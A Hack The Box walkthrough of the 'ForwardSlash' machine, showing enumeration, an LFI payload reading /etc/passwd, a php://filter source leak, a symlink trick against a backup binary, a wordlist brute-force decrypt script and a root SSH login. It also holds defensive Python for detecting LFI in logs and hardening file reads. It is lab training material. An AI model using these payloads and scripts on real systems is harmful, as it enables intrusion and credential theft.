HTB Walkthrough ForwardSlash 10.10.10.183

Summary
Foothold
After some web enumeration we find a backup site that still contains an LFI. Looking around, we find a dev folder containing an index.php file, and in that file we find credentials.
User
After logging in we still need to become another user to get more privileges. That user is called pain and he owns a binary called backup; when we run it we see it will read a file when we supply the right timestamp. Abusing that lets us read a config .bak file and obtain pain's credentials.
Root
In pain's home folder he mentions that he encrypted something. Luckily he left the decrypt routine behind, so we could build a brute-force decrypt script. With the passphrase we could mount a backup and grab root's id_rsa.
Enumeration
Nmap
nmap -sC -sV -p- 10.10.10.183

Only two ports are open: 22 and 80.
Web
When visiting http://10.10.10.183 we get redirected to http://forwardslash.htb/, so let's put this in our hosts file.


This page doesn't show much, so we now use gobuster to see if there are any interesting folders or files:
gobuster dir -u http://forwardslash.htb/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php,txt

After scanning we discover a note.txt which contains the following:
Pain, we were hacked by some skids that call themselves the "Backslash Gang"... I know... That name... Anyway I am just leaving this note here to say that we still have that backup site so we should be fine. -chiv
So we have two potential usernames, pain and chiv, and they mention there is a backup site. Now we can use wfuzz to discover subdomains:
wfuzz -u http://forwardslash.htb -H "Host: FUZZ.forwardslash.htb" -w /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt --hw 0

backup is a hit, so let's add that to our hosts file.

New page:

We aren't able to log in with default creds, but we can create our own account. Now let's log in with that:


After clicking around, the "change your Profile Picture" page looks interesting because they disabled the form:

Taking a look at the source code to find out which parameter they are using:

Turns out it is url.
Now let's send this page to Burp and try to use the form anyway.
Turns out this form is vulnerable to LFI.

Burp request:
POST /profilepicture.php HTTP/1.1
Host: backup.forwardslash.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=1geaonp5t1c3pt937l15m24mt9
Upgrade-Insecure-Requests: 1
Content-Length: 45
url=/../../../../../../../../../../etc/passwd
After searching I couldn't really find anything. Since we didn't scan the new vhost for hidden folders yet, it's time to do that now:
gobuster dir -u http://backup.forwardslash.htb/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php,txt

We found a few files, including a config file which contains:
<?php
//credentials for the temp db while we recover, had to backup old config, didn't want it getting compromised -pain
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'www-data');
define('DB_PASSWORD', '5iIwJX0C2nZiIhkLYE7n314VcKNx8uMkxfLvCTz2USGY180ocz3FQuVtdCy3dAgIMK3Y8XFZv9fBi6OwG6OYxoAVnhaQkm7r2ec');
define('DB_NAME', 'site');
/* Attempt to connect to MySQL database */
$link = mysqli_connect(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);
// Check connection
if($link === false){
    die("ERROR: Could not connect. " . mysqli_connect_error());
}
?>
Turns out this file doesn't bring us anything, so time to explore the dev folder:
gobuster dir -u http://backup.forwardslash.htb/dev -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php,txt

In the dev folder there is only an index.php.
When we try to read that file with our LFI we get the message: Permission Denied; not that way 😉

So there must be another way to read this file.
When we use the php://filter wrapper with base64 encoding, we get the file back base64-encoded:
url=php://filter/convert.base64-encode/resource=dev/index.php
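A defensive counterpart to the two LFI payloads above (the ../ traversal and the php://filter wrapper in the url parameter), added here as an example that is not part of the original walkthrough: a small Python scanner that flags such requests in Apache-style access logs. The log lines are constructed samples; POST bodies are not logged, so the same payloads are shown in the query string of GET requests.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache-style access log lines (not taken from the box). POST bodies are
# not logged, so the same payloads are shown in the query string of GET requests.
SAMPLE_LOG = """\
10.10.14.2 - - [20/Apr/2020:16:40:01 +0000] "POST /profilepicture.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.14.2 - - [20/Apr/2020:16:40:09 +0000] "GET /profilepicture.php?url=/../../../../etc/passwd HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.10.14.2 - - [20/Apr/2020:16:41:30 +0000] "GET /profilepicture.php?url=php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3Ddev%2Findex.php HTTP/1.1" 200 3090 "-" "Mozilla/5.0"
10.10.14.2 - - [20/Apr/2020:16:42:00 +0000] "GET /profilepicture.php?url=http://backup.forwardslash.htb/avatar.png HTTP/1.1" 200 811 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Each rule is a predicate over the fully percent-decoded request path.
RULES = [
    ("path_traversal", lambda p: "../" in p or "..\\" in p),
    ("php_wrapper", lambda p: re.search(r"php://(filter|input|data)", p, re.I) is not None),
    ("sensitive_file", lambda p: re.search(r"/etc/(passwd|shadow)|/proc/self/", p) is not None),
]

def decode_fully(s, rounds=3):
    """Undo repeated percent-encoding so double-encoded payloads do not slip past."""
    for _ in range(rounds):
        d = unquote_plus(s)
        if d == s:
            break
        s = d
    return s

def scan_access_log(text):
    """Return (ip, timestamp, decoded path, [rules fired]) for each suspicious request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path = decode_fully(m.group("path"))
        fired = [name for name, pred in RULES if pred(path)]
        if fired:
            hits.append((m.group("ip"), m.group("ts"), path, fired))
    return hits

if __name__ == "__main__":
    for ip, ts, path, fired in scan_access_log(SAMPLE_LOG):
        print(ts, ip, ",".join(fired), path)
```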

Decode:

We found some creds:
chiv:N0bodyL1kesBack/
Log in with SSH:

And we are logged in.
After some enumeration we see pain is also a user on the box. We can read one file in his home folder, called note.txt:
Pain, even though they got into our server, I made sure to encrypt any important files and then did some crypto magic on the key… I gave you the key in person the other day, so unless these hackers are some crypto experts we should be good to go.
-chiv
We are also able to look into a folder named encryptorinator.
The folder contains 2 files:
- ciphertext
- encrypter.py
After some more enumeration we also find a note in /var/backups:
Chiv, this is the backup of the old config, the one with the password we need to actually keep safe. Please DO NOT TOUCH.
-Pain
After that we find out there is a binary called backup, which is owned by pain:

When we run this we see the following:
Pain's Next-Gen Time Based Backup Viewer
v0.1
NOTE: not reading the right file yet,
only works if backup is taken in same second
----------------------------------------------------------------------
Current Time: 16:49:23
ERROR: e8f539d01f643161206b6f9ff1353c05 Does Not Exist or Is Not Accessible By Me, Exiting...
So it looks like we can read backup files when a backup is made in the same second. In /var/backups there is one interesting file, also owned by pain, called config.php.bak.
To read this file we create a script that "fools" the backup binary into reading that file for us:
#!/bin/bash
# The backup binary reads a file named md5(HH:MM:SS) from the current directory,
# so we create a symlink with that name pointing at the file we want it to read.
time=$(date +"%T")
hash=$(echo -n "$time" | md5sum | cut -d' ' -f1)
ln -s /var/backups/config.php.bak "$hash"
/usr/bin/backup
chmod +x secwalk.sh
./secwalk.sh

We found some creds:
Current Time: 16:56:39
<?php
/* Database credentials. Assuming you are running MySQL
server with default setting (user 'root' with no password) */
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'pain');
define('DB_PASSWORD', 'db1f73a72678e857d91e71d2963a1afa9efbabb32164cc1d94dbc704');
define('DB_NAME', 'site');
/* Attempt to connect to MySQL database */
$link = mysqli_connect(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);
// Check connection
if($link === false){
    die("ERROR: Could not connect. " . mysqli_connect_error());
}
?>
pain:db1f73a72678e857d91e71d2963a1afa9efbabb32164cc1d94dbc704
At first glance it looks like we found a hash, but it turns out this is just pain's password.
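Why the time-based backup viewer above could be pointed at config.php.bak, and the check a hardened viewer would make, as an added Python model that is not the box's binary: the weak version opens whatever the md5(time) name resolves to, while the safe version refuses symlinks and anything that is not a regular file. The temp directory and file contents are constructed for the demo.

```python
import hashlib
import os
import stat
import tempfile
import time

def backup_name(now=None):
    """Name the viewer looks for: md5 of the current HH:MM:SS, as on the box."""
    return hashlib.md5(time.strftime("%H:%M:%S", time.localtime(now)).encode()).hexdigest()

def read_backup_unsafe(backup_dir, name):
    """Model of the weak behaviour: opens whatever the name resolves to, symlinks included."""
    with open(os.path.join(backup_dir, name), "rb") as f:
        return f.read()

def read_backup_safe(backup_dir, name):
    """Hardened read: bare filename only, no symlink at the final component, regular files only."""
    if os.sep in name or name in ("", ".", ".."):
        raise PermissionError("backup name must be a bare filename")
    # O_NOFOLLOW makes open() fail with ELOOP if the last path component is a symlink.
    # Hard links are not caught by this; pin ownership (st_uid) as well if that matters.
    fd = os.open(os.path.join(backup_dir, name), os.O_RDONLY | os.O_NOFOLLOW)
    with os.fdopen(fd, "rb") as f:  # the file object now owns fd
        if not stat.S_ISREG(os.fstat(f.fileno()).st_mode):
            raise PermissionError("not a regular file")
        return f.read()

def demo():
    """Constructed scenario: a symlink named like the expected backup points outside the dir."""
    base = tempfile.mkdtemp()
    backups = os.path.join(base, "backups")
    os.mkdir(backups)
    outside = os.path.join(base, "config.php.bak")  # stands in for the protected file
    with open(outside, "w") as f:
        f.write("define('DB_PASSWORD', 'constructed-sample');\n")
    with open(os.path.join(backups, "legit.bak"), "w") as f:
        f.write("real backup\n")
    name = backup_name()
    os.symlink(outside, os.path.join(backups, name))
    leaked = read_backup_unsafe(backups, name)
    try:
        read_backup_safe(backups, name)
        blocked = False
    except OSError:  # ELOOP raised by O_NOFOLLOW
        blocked = True
    legit = read_backup_safe(backups, "legit.bak")
    return leaked, blocked, legit

if __name__ == "__main__":
    print(demo())
```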

When we run sudo -l as pain we get the following:

We should be able to mount a backup. Earlier we found an img file at /var/backups/recovery/encrypted_backup.img.
When we run the Linux file command against it we see it is LUKS encrypted:

We should be able to unlock the image like this:
sudo /sbin/cryptsetup luksOpen /var/backups/recovery/encrypted_backup.img backup
But, as expected, we get asked for a passphrase.
In pain's folder there was a note about crypto. Since we have the ciphertext file and the encrypter file, we should be able to decrypt the ciphertext.
I downloaded the files to my machine and changed encrypter.py a little bit so we could brute-force the key.
I added the following to the script:
def bruteforce():
    # decrypt() is the function from encrypter.py, to which this is appended.
    # Runs under Python 2 like the original: decrypt() works on str, not bytes.
    ciphertext = open('ciphertext', 'rb').read()
    wordlist = open('/usr/share/wordlists/rockyou.txt', 'r')
    out = open('dec.txt', 'w+')
    for w in wordlist:
        key = w.rstrip('\n')          # the candidate key is the word without its newline
        dec = decrypt(key, ciphertext)
        if 'the' in dec:              # crude check for readable English
            print(key + ': ' + dec.decode(errors='ignore'))
            out.write(key + ': ' + dec + '\n')
    out.close()
bruteforce()
python decrypt2.py
~Uy.diWyou liked my new encryption tool, pretty secure huh, anyway here is the key to the encrypted image from /var/backups/recovery: cB!6%sdH8Lj^@Y*$C2cf
key: cB!6%sdH8Lj^@Y*$C2cf
Now it is time to run the luksOpen command again:
sudo /sbin/cryptsetup luksOpen /var/backups/recovery/encrypted_backup.img backup
cB!6%sdH8Lj^@Y*$C2cf
sudo /bin/mount /dev/mapper/backup ./mnt/

The backup contains an id_rsa file:

chmod 600 id_rsa
ssh -i id_rsa root@10.10.10.183

made by S3cwalk
Disclaimer: Please use our posts for educational purposes only. Wrong usage could make you end up in jail.